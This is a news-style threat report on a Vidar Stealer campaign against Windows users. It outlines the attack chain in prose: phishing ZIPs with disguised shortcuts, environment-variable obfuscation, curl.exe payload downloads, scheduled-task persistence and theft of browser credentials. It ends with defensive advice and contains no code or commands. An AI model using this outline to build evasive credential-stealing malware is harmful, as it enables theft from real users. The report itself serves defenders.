A sophisticated new campaign using Vidar Stealer has emerged, specifically targeting Windows users. This campaign employs an intricate attack chain that bypasses endpoint detection systems to steal sensitive user credentials.
Vidar Stealer’s Evolution and Impact
Vidar Stealer, an infamous data-stealing malware initially seen in 2018, is known for extracting valuable information such as browser passwords and cryptocurrency wallet data. The latest campaign enhances these capabilities with advanced evasion tactics to consistently slip past Endpoint Detection and Response (EDR) tools.
The stealthy nature of this campaign has caught the attention of cybersecurity experts because of its ability to complete its malicious tasks before victims become aware of the breach.
Advanced Evasion Techniques
Genians Security Center researchers have identified the use of multi-stage delivery methods, obfuscated script execution, and exploitation of legitimate system utilities to avoid detection. The attack begins with spear-phishing emails that match the recipient’s professional context, containing ZIP files that disguise malicious Windows shortcuts as legitimate documents.
When opened, these shortcuts initiate hidden scripts that download additional payloads. The process uses environment variable-based obfuscation to prevent static analysis tools from recognizing malicious activities.
Challenges in Detection and Mitigation
The campaign’s use of environment variable-based substring expansion ensures that security systems evaluate command fragments individually, obscuring the overall malicious intent. Additionally, the attack leverages the Windows tool curl.exe to download further payloads, a tactic known as Living-off-the-Land.
Persistent threats are maintained through scheduled tasks that mimic legitimate Microsoft processes, allowing the malware to run consistently. The final payload acts as a backdoor, enabling remote command execution and data exfiltration.
Implications and Defensive Measures
The primary goal of this campaign is to extract credentials stored in Chromium-based browsers by decrypting key files using Windows CryptUnprotectData API. With multiple command-and-control domains spread globally, infrastructure-based blocking is challenging.
To counter these threats, organizations should bolster behavior-based EDR capabilities, restrict execution of shortcut files in archives, and avoid storing credentials in browsers. Regular auditing of scheduled tasks is also recommended to mitigate exposure.
As the cybersecurity landscape evolves, staying informed and adopting robust security measures is crucial in defending against increasingly sophisticated threats like the Vidar Stealer campaign.
